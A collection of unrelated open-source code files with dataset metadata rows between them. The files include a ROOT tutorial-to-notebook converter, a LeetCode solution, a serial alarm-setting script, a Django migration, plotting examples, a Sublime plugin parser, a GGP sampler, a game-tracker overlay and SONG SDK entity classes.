code = code.replace("using namespace RooFit;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooFit;\n# <codecell>\n")
code = code.replace("using namespace RooStats;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace RooStats;\n# <codecell>\n")
code = code.replace("using namespace ROOT::Math;", "# <codecell>\n%%cpp -d\n// This is a workaround to make sure the namespace is used inside functions\nusing namespace ROOT::Math;\n# <codecell>\n")
return code
def rs401dGetFiles(code):
if tutName == "rs401d_FeldmanCousins":
code = code.replace(
"""#if !defined(__CINT__) || defined(__MAKECINT__)\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.h"\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.cxx" // so that it can be executed directly\n#else\n#include "../tutorials/roostats/NuMuToNuE_Oscillation.cxx+" // so that it can be executed directly\n#endif""" , """std::string tutDir = gROOT->GetTutorialsDir();\nTString headerDir = TString::Format("#include \\\"%s/roostats/NuMuToNuE_Oscillation.h\\\"", tutDir.c_str());\nTString impDir = TString::Format("#include \\\"%s/roostats/NuMuToNuE_Oscillation.cxx\\\"", tutDir.c_str());\ngROOT->ProcessLine(headerDir);\ngROOT->ProcessLine(impDir);""")
return code
def declareIncludes(code):
if tutName != "fitcont":
code = re.sub(r"# <codecell>\s*#include", "# <codecell>\n%%cpp -d\n#include" , code)
return code
def tree4GetFiles(code):
if tutName == "tree4":
code = code.replace(
"""#include \"../test/Event.h\"""" , """# <codecell>\nTString dir = "$ROOTSYS/test/Event.h";\ngSystem->ExpandPathName(dir);\nTString includeCommand = TString::Format("#include \\\"%s\\\"" , dir.Data());\ngROOT->ProcessLine(includeCommand);""")
return code
def disableDrawProgressBar(code):
code = code.replace(":DrawProgressBar",":!DrawProgressBar")
return code
def fixes(code):
codeTransformers=[removePaletteEditor, runEventExe, getLibMathMore,
roofitRemoveSpacesComments, declareNamespace, rs401dGetFiles ,
declareIncludes, tree4GetFiles, disableDrawProgressBar]
for transformer in codeTransformers:
code = transformer(code)
return code
def changeMarkdown(code):
code = code.replace("~~~" , "```")
code = code.replace("{.cpp}", "cpp")
code = code.replace("{.bash}", "bash")
return code
def isCpp():
"""
Return True if extension is a C++ file
"""
return extension in ("C", "c", "cpp", "C++", "cxx")
def findTimeout():
listLongTutorials = ["OneSidedFrequentistUpperLimitWithBands", "StandardBayesianNumericalDemo",
"TwoSidedFrequentistUpperLimitWithBands" , "HybridStandardForm", "rs401d_FeldmanCousins",
"TMVAMultipleBackgroundExample", "TMVARegression", "TMVAClassification", "StandardHypoTestDemo"]
if tutName in listLongTutorials:
return 300
else:
return 90
# -------------------------------------
# ------------ Main Program------------
# -------------------------------------
def mainfunction(text):
"""
Main function. Calls all other functions, depending on whether the macro input is in python or c++.
It adds the header information. Also, it adds a cell that draws all canvases. The working text is
then converted to a version 3 jupyter notebook, subsequently updated to a version 4. Then, metadata
associated with the language the macro is written in is attatched to he notebook. Finally the
notebook is executed and output as a Jupyter notebook.
"""
# Modify text from macros to suit a notebook
if isCpp():
main, helpers, rest = split(text)
main, argumentsCell = processmain(main)
main = cppComments(unindenter(cppFunction(main))) # Remove function, Unindent, and convert comments to Markdown cells
if argumentsCell:
main = argumentsCell + main
rest = cppComments(rest) # Convert top level code comments to Markdown cells
# Construct text by starting with top level code, then the helper functions, and finally the main function.
# Also add cells for headerfile, or keepfunction
if needsHeaderFile:
text = "# <markdowncell>\n# The header file must be copied to the current directory\n# <codecell>\n.!cp %s%s.h .\n# <codecell>\n" % (tutRelativePath, tutName)
text += rest
else:
text = "# <codecell>\n" + rest
for helper in helpers:
text += helper
text += ("\n# <codecell>\n" + main)
if extension == "py":
text = pythonMainFunction(text)
text = pythonComments(text) # Convert comments into Markdown cells
# Perform last minute fixes to the notebook, used for specific fixes needed by some tutorials
text = fixes(text)
# Change to standard Markdown
newDescription = changeMarkdown(description)
# Add the title and header of the notebook
text = "# <markdowncell> \n# # %s\n%s# \n# \n# **Author:** %s \n# <i><small>This notebook tutorial was automatically generated " \
"with <a href= \"https://github.com/root-mirror/root/blob/master/documentation/doxygen/converttonotebook.py\">ROOTBOOK-izer (Beta)</a> " \
"from the macro found in the ROOT repository on %s.</small></i>\n# <codecell>\n%s" % (tutTitle, newDescription, author, date, text)
# Add cell at the end of the notebook that draws all the canveses. Add a Markdown cell before explaining it.
if isJsroot and not nodraw:
if isCpp():
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\n%jsroot on\ngROOT->GetListOfCanvases()->Draw()"
if extension == "py":
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\n%jsroot on\nfrom ROOT import gROOT \ngROOT.GetListOfCanvases().Draw()"
elif not nodraw:
if isCpp():
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\ngROOT->GetListOfCanvases()->Draw()"
if extension == "py":
text += "\n# <markdowncell> \n# Draw all canvases \n# <codecell>\nfrom ROOT import gROOT \ngROOT.GetListOfCanvases().Draw()"
# Create a notebook from the working text
nbook = v3.reads_py(text)
nbook = v4.upgrade(nbook) # Upgrade v3 to v4
# Load notebook string into json format, essentially creating a dictionary
json_data = json.loads(v4.writes(nbook))
# add the corresponding metadata
if extension == "py":
json_data[u'metadata'] = {
"kernelspec": {
"display_name": "Python 2",
"language": "python",
"name": "python2"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 2
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython2",
"version": "2.7.10"
}
}
elif isCpp():
json_data[u'metadata'] = {
"kernelspec": {
"display_name": "ROOT C++",
"language": "c++",
"name": "root"
},
"language_info": {
"codemirror_mode": "text/x-c++src",
"file_extension": ".C",
"mimetype": " text/x-c++src",
"name": "c++"
}
}
# write the json file with the metadata
with open(outPathName, 'w') as fout:
json.dump(json_data, fout, indent=1, sort_keys=True)
print(time.time() - starttime)
timeout = findTimeout()
# Call commmand that executes the notebook and creates a new notebook with the output
r = subprocess.call(["jupyter", "nbconvert", "--ExecutePreprocessor.timeout=%d" % timeout, "--to=notebook", "--execute", outPathName])
if r != 0:
sys.stderr.write("NOTEBOOK_CONVERSION_WARNING: Nbconvert failed for notebook %s with return code %s\n" %(outname,r))
if isJsroot:
subprocess.call(["jupyter", "trust", os.path.join(outdir, outnameconverted)])
if r == 0: # Only remove notebook without output if nbconvert succeedes
os.remove(outPathName)
if __name__ == "__main__":
if str(sys.argv[1]) == "-test":
tutName = "tutorial"
doctest.testmod(verbose=True)
else:
# -------------------------------------
# ----- Preliminary definitions--------
# -------------------------------------
# Extract and define the name of the file as well as its derived names
tutPathName = str(sys.argv[1])
tutPath = os.path.dirname(tutPathName)
if tutPath.split("/")[-2] == "tutorials":
tutRelativePath = "$ROOTSYS/tutorials/%s/" % tutPath.split("/")[-1]
tutFileName = os.path.basename(tutPathName)
tutName, extension = tutFileName.split(".")
tutTitle = re.sub( r"([A-Z\d])", r" \1", tutName).title()
outname = tutFileName + ".ipynb"
outnameconverted = tutFileName + ".nbconvert.ipynb"
# Extract output directory
try:
outdir = str(sys.argv[2])
except:
outdir = tutPath
outPathName = os.path.join(outdir, outname)
# Find and define the time and date this script is run
date = datetime.now().strftime("%A, %B %d, %Y at %I:%M %p")
# -------------------------------------
# -------------------------------------
# -------------------------------------
# Set DYLD_LIBRARY_PATH. When run without root access or as a different user, epecially from Mac systems,
# it is possible for security reasons that the enviornment does not include this definition, so it is manually defined.
os.environ["DYLD_LIBRARY_PATH"] = os.environ["ROOTSYS"] + "/lib"
# Open the file to be converted
with open(tutPathName) as fin:
text = fin.read()
# Extract information from header and remove header from text
if extension == "py":
text, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile = readHeaderPython(text)
elif isCpp():
text, description, author, isNotebook, isJsroot, nodraw, needsHeaderFile = readHeaderCpp(text)
if isNotebook:
starttime = time.time()
mainfunction(text)
print(time.time() - starttime)
else:
pass
|
lgpl-2.1
| 7,401,523,947,888,513,000
| 41.389222
| 670
| 0.592965
| false
| 3.84102
| false
| false
| false
|
zqfan/leetcode
|
algorithms/306. Additive Number/solution.py
|
1
|
1232
|
class Solution(object):
def isAdditiveNumber(self, num):
"""
:type num: str
:rtype: bool
"""
def str_add(s1, s2):
res = []
carry = 0; i1 = len(s1)-1; i2 = len(s2)-1
while i1 >= 0 or i2 >=0:
if i1 >= 0:
carry += ord(s1[i1]) - ord('0')
if i2 >= 0:
carry += ord(s2[i2]) - ord('0')
res.append(str(carry % 10))
carry /= 10; i1 -= 1; i2 -= 1
if carry:
res.append('1')
return ''.join(reversed(res))
l = len(num)
for i in xrange(l/2):
if i > 0 and num[0] == '0':
break
s1 = num[:i+1]
for j in xrange(i+1, 2*l/3):
if j - i > 1 and num[i+1] == '0':
break
s2 = num[i+1:j+1]
s = str_add(s1, s2)
k = j + 1
while k < l:
if s != num[k:k+len(s)]:
break
k += len(s)
s, s2 = str_add(s2, s), s
if k == l:
return True
return False
|
gpl-3.0
| 5,049,437,436,025,781,000
| 30.589744
| 53
| 0.323052
| false
| 3.571014
| false
| false
| false
|
apeng2012/TimeSwitch4ModemRouter
|
SetTimer/switchTime.py
|
1
|
5093
|
import sys
import time
import serial
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
saveFileName = "SwitchTime.xml"
def list2xml(stList):
if len(stList) != 7:
print "DayOfWeek num error!"
return
weekname = "sunday", "monday", "tuesday", "wednesday", "thursday", "friday", "saturday"
root = ET.Element("switchTime")
i = 0
for itList in stList:
dayofweek = ET.SubElement(root, weekname[i])
print weekname[i]
i = i+1
for it in itList:
item = ET.SubElement(dayofweek, "item")
item.text = it
print "\t"+it
# wrap it in an ElementTree instance, and save as XML
tree = ET.ElementTree(root)
tree.write(saveFileName)
def xml2list(stList):
tree = ET.ElementTree(file=saveFileName)
root = tree.getroot();
i=0
for day in root:
print day.tag
for elem in day:
print elem.text
stList[i].append(elem.text)
i = i+1
#!/usr/bin/env python
#encoding: utf-8
import ctypes
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE= -11
STD_ERROR_HANDLE = -12
FOREGROUND_BLACK = 0x0
FOREGROUND_BLUE = 0x01 # text color contains blue.
FOREGROUND_GREEN= 0x02 # text color contains green.
FOREGROUND_RED = 0x04 # text color contains red.
FOREGROUND_INTENSITY = 0x08 # text color is intensified.
BACKGROUND_BLUE = 0x10 # background color contains blue.
BACKGROUND_GREEN= 0x20 # background color contains green.
BACKGROUND_RED = 0x40 # background color contains red.
BACKGROUND_INTENSITY = 0x80 # background color is intensified.
class Color:
''' See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winprog/winprog/windows_api_reference.asp
for information on Windows APIs.'''
std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
def set_cmd_color(self, color, handle=std_out_handle):
"""(color) -> bit
Example: set_cmd_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY)
"""
bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
return bool
def reset_color(self):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE)
def print_red_text(self, print_text):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_green_text(self, print_text):
self.set_cmd_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_blue_text(self, print_text):
self.set_cmd_color(FOREGROUND_BLUE | FOREGROUND_INTENSITY)
print print_text
self.reset_color()
def print_red_text_with_blue_bg(self, print_text):
self.set_cmd_color(FOREGROUND_RED | FOREGROUND_INTENSITY| BACKGROUND_BLUE | BACKGROUND_INTENSITY)
print print_text
self.reset_color()
def main():
ser = serial.Serial(sys.argv[1], 9600, timeout=1)
#ser = serial.Serial('COM10', 9600, timeout=1)
if ser.isOpen() != True:
print "open serial port error!"
return
clr = Color()
#Hi
cmd = "Hi"
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res)
if res.find("Hello") == -1:
print "please reset board or check serial port."
return
#SetDateTime 2014-01-27 13:21:25 1
dt = time.localtime()
cmd = time.strftime("SetDateTime %Y-%m-%d %H:%M:%S %w\r\n", dt)
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res)
#GetDateTime
cmd = "GetDateTime"
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res)
reList = [[] for i in range(7)]
#ReadAlarm
cmd = "ReadAlarm"
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res) # "ReadAlarm x
for i in range(7):
while True:
res = ser.readline(); res.strip(); clr.print_green_text(res)
if res.find("no alarm") != -1:
continue
if res.find("weekday") != -1:
break
reList[i].append(res[0:12])
list2xml(reList)
print "Please set switch time in " + saveFileName
raw_input("Press Enter to continue...")
reList = [[] for i in range(7)]
xml2list(reList)
# WriteAlarmX 1>hh:mm-hh:mm 2>...
for i in range(7):
cmd = "WriteAlarm" + str(i) + " "
j = 1
for t in reList[i]:
t.strip()
cmd = cmd + str(j) + ">" + t + " "
j = j + 1
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res)
# ProgramAlarm
cmd = "ProgramAlarm"
ser.write(cmd); print cmd
res = ser.readline(); res.strip(); clr.print_green_text(res)
print "Config Over. reset board to start"
ser.close()
if __name__=='__main__':
main()
|
gpl-2.0
| -8,980,545,949,764,376,000
| 28.275862
| 118
| 0.611427
| false
| 3.320078
| false
| false
| false
|
tiagovaz/saskatoon
|
saskatoon/harvest/migrations/0002_auto_20180507_1941.py
|
1
|
4140
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2018-05-07 23:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('harvest', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='historicalproperty',
name='approximative_maturity_date',
field=models.DateField(blank=True, null=True, verbose_name='Approximative maturity date'),
),
migrations.AddField(
model_name='historicalproperty',
name='fruits_height',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Height of lowest fruits'),
),
migrations.AddField(
model_name='historicalproperty',
name='harvest_every_year',
field=models.BooleanField(default=False, verbose_name='Produces fruits every year'),
),
migrations.AddField(
model_name='historicalproperty',
name='ladder_available',
field=models.BooleanField(default=False, verbose_name='There is a ladder available in the property'),
),
migrations.AddField(
model_name='historicalproperty',
name='ladder_available_for_outside_picks',
field=models.BooleanField(default=False, verbose_name='A ladder is available in the property and can be used for nearby picks'),
),
migrations.AddField(
model_name='historicalproperty',
name='number_of_trees',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Total number of trees in this property'),
),
migrations.AddField(
model_name='historicalproperty',
name='trees_accessibility',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Trees accessibility'),
),
migrations.AddField(
model_name='historicalproperty',
name='validated',
field=models.BooleanField(default=b'True', help_text='This property data has been reviewed and validatedby a collective member', verbose_name='Validated'),
),
migrations.AddField(
model_name='property',
name='approximative_maturity_date',
field=models.DateField(blank=True, null=True, verbose_name='Approximative maturity date'),
),
migrations.AddField(
model_name='property',
name='fruits_height',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Height of lowest fruits'),
),
migrations.AddField(
model_name='property',
name='harvest_every_year',
field=models.BooleanField(default=False, verbose_name='Produces fruits every year'),
),
migrations.AddField(
model_name='property',
name='ladder_available',
field=models.BooleanField(default=False, verbose_name='There is a ladder available in the property'),
),
migrations.AddField(
model_name='property',
name='ladder_available_for_outside_picks',
field=models.BooleanField(default=False, verbose_name='A ladder is available in the property and can be used for nearby picks'),
),
migrations.AddField(
model_name='property',
name='number_of_trees',
field=models.PositiveIntegerField(blank=True, null=True, verbose_name='Total number of trees in this property'),
),
migrations.AddField(
model_name='property',
name='trees_accessibility',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Trees accessibility'),
),
migrations.AddField(
model_name='property',
name='validated',
field=models.BooleanField(default=b'True', help_text='This property data has been reviewed and validatedby a collective member', verbose_name='Validated'),
),
]
|
agpl-3.0
| -6,729,985,459,804,566,000
| 42.578947
| 167
| 0.618599
| false
| 4.466019
| false
| false
| false
|
colour-science/colour
|
colour/examples/plotting/examples_volume_plots.py
|
1
|
1465
|
# -*- coding: utf-8 -*-
"""
Showcases colour models volume and gamut plotting examples.
"""
import numpy as np
from colour.plotting import (plot_RGB_colourspaces_gamuts, plot_RGB_scatter,
colour_style)
from colour.utilities import message_box
message_box('Colour Models Volume and Gamut Plots')
colour_style()
message_box(('Plotting "ITU-R BT.709" RGB colourspace volume in "CIE xyY" '
'colourspace.'))
plot_RGB_colourspaces_gamuts(
('ITU-R BT.709', ), reference_colourspace='CIE xyY')
print('\n')
message_box(('Comparing "ITU-R BT.709" and "ACEScg" RGB colourspaces volume '
'in "CIE L*a*b*" colourspace.'))
plot_RGB_colourspaces_gamuts(
('ITU-R BT.709', 'ACEScg'),
reference_colourspace='CIE Lab',
face_colours=(None, (0.25, 0.25, 0.25)),
edge_colours=(None, (0.25, 0.25, 0.25)),
edge_alpha=(1.0, 0.1),
face_alpha=(1.0, 0.0))
print('\n')
message_box(('Plotting "ACEScg" colourspaces values in "CIE L*a*b*" '
'colourspace.'))
RGB = np.random.random((32, 32, 3))
plot_RGB_scatter(
RGB,
'ACEScg',
reference_colourspace='CIE Lab',
colourspaces=('ACEScg', 'ITU-R BT.709'),
face_colours=((0.25, 0.25, 0.25), None),
edge_colours=((0.25, 0.25, 0.25), None),
edge_alpha=(0.1, 0.5),
face_alpha=(0.1, 0.5),
grid_face_colours=(0.1, 0.1, 0.1),
grid_edge_colours=(0.1, 0.1, 0.1),
grid_edge_alpha=0.5,
grid_face_alpha=0.1)
|
bsd-3-clause
| 7,481,060,059,926,544,000
| 27.173077
| 77
| 0.612287
| false
| 2.723048
| false
| true
| false
|
nsubiron/SublimeSuricate
|
suricate/command_parser.py
|
1
|
3785
|
# Sublime Suricate, Copyright (C) 2013 N. Subiron
#
# This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you
# are welcome to redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
import collections
import sublime
from . import _suricate as suricate
from . import flags
_DEFAULT_DEFAULTS = \
{
'caption': 'No description provided',
'mnemonic': None,
'group': None,
'args': {},
'flags': None,
'keys': [],
'selector': None,
'context': None,
'context_menu': False
}
_TAG_LIST = ['call'] + [x for x in _DEFAULT_DEFAULTS.keys()]
_PLATFORM = sublime.platform()
Command = collections.namedtuple('Command', _TAG_LIST)
class _CommandParser(object):
def __init__(self, settings):
self.ignore_default_keybindings = settings.get('ignore_default_keybindings', False)
self.override_ctrl_o = settings.get('override_default_opening_key', False)
key_map = settings.get('key_map', {})
self.os_key_map = dict(key_map.get('*', {}))
self.os_key_map.update(dict(key_map.get(_PLATFORM, {})))
self.commands = {}
def parse(self, profile):
data = self._get_commands(profile, 'commands')
if self.ignore_default_keybindings:
self._remove_key_bindings(data)
user_data = self._get_commands(profile, 'user_commands')
self._rupdate(data, user_data)
defaults = self._merge_platform_specific_tags(profile.get('defaults', _DEFAULT_DEFAULTS))
for key, item in data.items():
try:
args = dict(defaults)
args.update(item)
args['flags'] = flags.from_string(str(args['flags']))
if flags.check_platform(args['flags']):
if args['keys']:
args['keys'] = self._map_keybinding(args['keys'])
self.commands[key] = Command(**args)
except Exception as exception:
suricate.log('WARNING: Command %r not added: %s', key, exception)
@staticmethod
def _rupdate(lhs, rhs):
for key, irhs in rhs.items():
ilhs = lhs.get(key, {})
ilhs.update(irhs)
lhs[key] = ilhs
@staticmethod
def _remove_key_bindings(data):
for item in data.values():
if 'keys' in item:
item.pop('keys')
def _get_commands(self, profile, key):
data = profile.get(key, {})
return dict((k, self._merge_platform_specific_tags(v)) for k, v in data.items())
@staticmethod
def _merge_platform_specific_tags(raw_data):
data = {}
for tag in _TAG_LIST:
os_tag = tag + '.' + _PLATFORM
if os_tag in raw_data:
data[tag] = raw_data[os_tag]
elif tag in raw_data:
data[tag] = raw_data[tag]
return data
def _map_keybinding(self, keybinding):
# Override <c>+o.
if self.override_ctrl_o and keybinding[0] == '<c>+o':
keybinding = [self.override_ctrl_o] + keybinding[1:]
# Map keys by platform.
for key, value in self.os_key_map.items():
keybinding = [x.replace(key, value) for x in keybinding]
return keybinding
def parse_profiles(profiles):
assert suricate.api_is_ready()
parser = _CommandParser(suricate.load_settings())
for profile_file_name in profiles:
profile = sublime.load_settings(profile_file_name)
parser.parse(profile)
return parser.commands
|
gpl-3.0
| -5,906,764,279,225,393,000
| 33.099099
| 97
| 0.575429
| false
| 3.788789
| false
| false
| false
|
arongdari/sparse-graph-prior
|
sgp/GGPrnd.py
|
1
|
3729
|
import numpy as np
from scipy.special import gamma, gammaln
def W(t, x, alpha, sigma, tau):
if tau > 0:
logout = np.log(alpha) + np.log(1. - np.exp(-tau * (x - t))) + (-1 - sigma) * np.log(t) + (-t * tau) - np.log(
tau) - gammaln(1. - sigma)
else:
logout = np.log(alpha) - gammaln(1. - sigma) - np.log(sigma) + np.log(t ** (-sigma) - x ** (-sigma))
return np.exp(logout)
def inv_W(t, x, alpha, sigma, tau):
if tau > 0:
out = t - 1. / tau * np.log(1. - gamma(1. - sigma) * x * tau / (alpha * t ** (-1. - sigma) * np.exp(-t * tau)))
else:
logout = -1. / sigma * np.log(t ** (-sigma) - sigma * gamma(1. - sigma) / alpha * x)
out = np.exp(logout)
return out
def GGPrnd(alpha, sigma, tau, T=0):
"""
GGPrnd samples points of a generalised gamma process
Samples the points of the GGP with Levy measure
alpha/Gamma(1-sigma) * w^(-1-sigma) * exp(-tau*w)
For sigma>=0, it samples points above the threshold T>0 using the adaptive
thinning strategy described in Favaro and Teh (2013).
Convert the same function used in BNPGraph matlab package by Francois Caron
http://www.stats.ox.ac.uk/~caron/code/bnpgraph/index.html
Reference:
S. Favaro and Y.W. Teh. MCMC for normalized random measure mixture
models. Statistical Science, vol.28(3), pp.335-359, 2013.
:param alpha: positive scalar
:param sigma: real in (-Inf, 1)
:param tau: positive scalar
:param T: truncation threshold; positive scalar
:return:
N: weights from the GGP
T: threshold
"""
# finite activity GGP, don't need to truncate
if sigma < 0:
rate = np.exp(np.log(alpha) - np.log(-sigma) + sigma * np.log(tau))
K = np.random.poisson(rate)
N = np.random.gamma(-sigma, scale=1. / tau, size=K)
T = 0
return N, T
# infinite activity GGP
if T == 0:
# set the threshold automatically
# Number of jumps of order alpha/sigma/Gamma(1-sigma) * T^{-sigma} for sigma > 0
# and alpha*log(T) for sigma = 0
if sigma > .1:
Njumps = 20000
T = np.exp(1. / sigma * (np.log(alpha) - np.log(sigma) - gammaln(1. - sigma) - np.log(Njumps)))
else:
T = 1e-10
if sigma > 0:
Njumps = np.floor(alpha / sigma / gamma(1. - sigma) * T ** (-sigma))
else:
Njumps = np.floor(-alpha * np.log(T))
else:
if T <= 0:
raise ValueError("Threshold T must be strictly positive")
if sigma > 1e-3:
Njumps = np.floor(alpha / sigma / gamma(1. - sigma) * T ** (-sigma))
else:
Njumps = np.floor(-alpha * np.log(T))
if Njumps > 1e7:
raise Warning("Expected number of jumps = %d" % Njumps)
# Adaptive thinning strategy
N = np.zeros(int(np.ceil(Njumps + 3 * np.sqrt(Njumps))))
k = 0
t = T
count = 0
while True:
e = -np.log(np.random.random()) # Sample exponential random variable of unit rate
if e > W(t, np.inf, alpha, sigma, tau):
N = N[0:k]
return N, T
else:
t_new = inv_W(t, e, alpha, sigma, tau)
if tau == 0 or np.log(np.random.random()) < (-1. - sigma) * np.log(t_new / t):
# if tau>0, adaptive thinning - otherwise accept always
if k > len(N):
N = np.append(N, np.zeros(Njumps))
N[k] = t_new
k += 1
t = t_new
count += 1
if count > 10e8:
# If too many computation, we lower the threshold T and rerun
T /= 10.
N, T = GGPrnd(alpha, sigma, tau, T)
return N, T
|
mit
| 3,136,497,266,407,477,000
| 33.211009
| 119
| 0.53875
| false
| 3.179028
| false
| false
| false
|
BrandonNowlin/RebirthItemTracker
|
src/view_controls/overlay.py
|
1
|
2633
|
"""
This module deals with everything related to the overlay text generated,
as well as formating how to display stats
"""
from game_objects.item import ItemInfo
class Overlay(object):
"""The main class to handle output to overlay text files"""
def __init__(self, prefix, tracker_state):
self.state = tracker_state
self.prefix = prefix
@staticmethod
def format_value(value):
"""Format a float value for displaying"""
# NOTE this is not only used in this class
# Round to 2 decimal places then ignore trailing zeros and trailing periods
# Doing just 'rstrip("0.")' breaks on "0.00"
display = format(value, ".2f").rstrip("0").rstrip(".")
# For example, set "0.6" to ".6"
if abs(value) < 1 and value != 0:
display = display.lstrip("0")
if value > -0.00001:
display = "+" + display
return display
@staticmethod
def format_transform(transform_set):
"""Format a transform_set for displaying"""
# NOTE this is not only used in this class
if len(transform_set) >= 3:
return "yes"
else:
return str(len(transform_set))
def update_stats(self, stat_list=None, transform_list=None):
"""
Update file content for a subset (or all) the player's stats.
stat_list provide the subset of stats to update, if None it will update everything
"""
if stat_list is None:
stat_list = ItemInfo.stat_list
for stat in stat_list:
display = Overlay.format_value(self.state.player_stats[stat])
with open(self.prefix + "overlay text/" + stat + ".txt", "w+") as sfile:
sfile.write(display)
if transform_list is None:
transform_list = ItemInfo.transform_list
for transform in transform_list:
display = Overlay.format_transform(self.state.player_transforms[transform])
with open(self.prefix + "overlay text/" + transform + ".txt", "w+") as sfile:
sfile.write(display)
def update_last_item_description(self):
"""Update the overlay file for item pickup description"""
item = self.state.last_item
desc = item.info.name
desc += ": " + item.generate_item_description()
with open(self.prefix + "overlay text/itemInfo.txt", "w+") as sfile:
sfile.write(desc)
def update_seed(self):
"""Update the overlay file the seed"""
with open(self.prefix + "overlay text/seed.txt", "w+") as sfile:
sfile.write(self.state.seed)
|
bsd-2-clause
| 2,913,179,788,774,310,000
| 37.15942
| 90
| 0.602735
| false
| 4.088509
| false
| false
| false
|
icgc-dcc/SONG
|
song-python-sdk/overture_song/entities.py
|
1
|
9524
|
import json
from typing import Any, Type
from dataclasses import dataclass
from overture_song.validation import Validatable
from overture_song.utils import Builder, default_value
from typing import List
from dataclasses import is_dataclass, asdict
from overture_song.utils import check_type, check_state
class Entity(object):
def to_json(self):
return json.dumps(self.to_dict(), indent=4)
def to_dict(self):
if is_dataclass(self):
return asdict(self)
else:
raise NotImplemented("not implemented for non-dataclass object")
def __str__(self):
return self.to_json()
@dataclass(frozen=False)
class Metadata(Entity):
info: dict = None
def __post_init__(self):
self.info = {}
def set_info(self, key: str, value: Any):
self.info[key] = value
def add_info(self, data: dict):
if data is None:
return
self.info.update(data)
@dataclass(frozen=False)
class Study(Metadata, Validatable):
studyId: str = None
name: str = None
organization: str = None
description: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, studyId, name=None, description=None, organization=None):
s = Study()
s.studyId = studyId
s.name = name
s.description = description
s.organization = organization
return s
@classmethod
def create_from_raw(cls, study_obj):
return Study.create(
study_obj.studyId,
name=study_obj.name,
description=study_obj.description,
organization=study_obj.organization)
@dataclass(frozen=False)
class File(Metadata, Validatable):
objectId: str = None
analysisId: str = None
fileName: str = None
studyId: str = None
fileSize: int = -1
fileType: str = None
fileMd5sum: str = None
fileAccess: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, fileName, fileSize, fileType, fileMd5sum,
fileAccess, studyId=None, analysisId=None, objectId=None, info=None):
f = File()
f.objectId = objectId
f.analysisId = analysisId
f.studyId = studyId
f.fileType = fileType
f.fileSize = fileSize
f.info = default_value(info, {})
f.fileMd5sum = fileMd5sum
f.fileAccess = fileAccess
f.fileName = fileName
return f
@dataclass(frozen=False)
class Sample(Metadata, Validatable):
sampleId: str = None
specimenId: str = None
sampleSubmitterId: str = None
sampleType: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, specimenId, sampleSubmitterId,
sampleType, sampleId=None, info=None):
s = Sample()
s.info = default_value(info, {})
s.specimenId = specimenId
s.sampleType = sampleType
s.sampleSubmitterId = sampleSubmitterId
s.sampleId = sampleId
return s
@dataclass(frozen=False)
class Specimen(Metadata, Validatable):
specimenId: str = None
donorId: str = None
specimenSubmitterId: str = None
specimenClass: str = None
specimenType: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, donorId, specimenSubmitterId, specimenClass, specimenType,
specimenId=None, info=None):
s = Specimen()
s.info = default_value(info, {})
s.specimenId = specimenId
s.donorId = donorId
s.specimenType = specimenType
s.specimenClass = specimenClass
s.specimenSubmitterId = specimenSubmitterId
return s
@dataclass(frozen=False)
class Donor(Metadata, Validatable):
donorId: str = None
donorSubmitterId: str = None
studyId: str = None
donorGender: str = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def create(cls, donorSubmitterId, studyId, donorGender, donorId=None, info=None):
d = Donor()
d.donorId = donorId
d.info = default_value(info, {})
d.studyId = studyId
d.donorSubmitterId = donorSubmitterId
d.donorGender = donorGender
return d
@dataclass(frozen=False)
class CompositeEntity(Sample):
specimen: Type[Specimen] = None
donor: Type[Donor] = None
def validate(self):
raise NotImplemented("not implemented")
@classmethod
def base_on_sample(cls, sample):
s = CompositeEntity()
s.sampleId = sample.sampleId
s.sampleSubmitterId = sample.sampleSubmitterId
s.sampleType = sample.sampleType
s.info = sample.info
s.specimenId = sample.specimenId
return s
@classmethod
def create(cls, donor, specimen, sample):
c = CompositeEntity.base_on_sample(sample)
check_type(donor, Donor)
check_type(specimen, Specimen)
c.donor = donor
c.specimen = specimen
return c
@dataclass(frozen=False)
class Experiment(Metadata):
pass
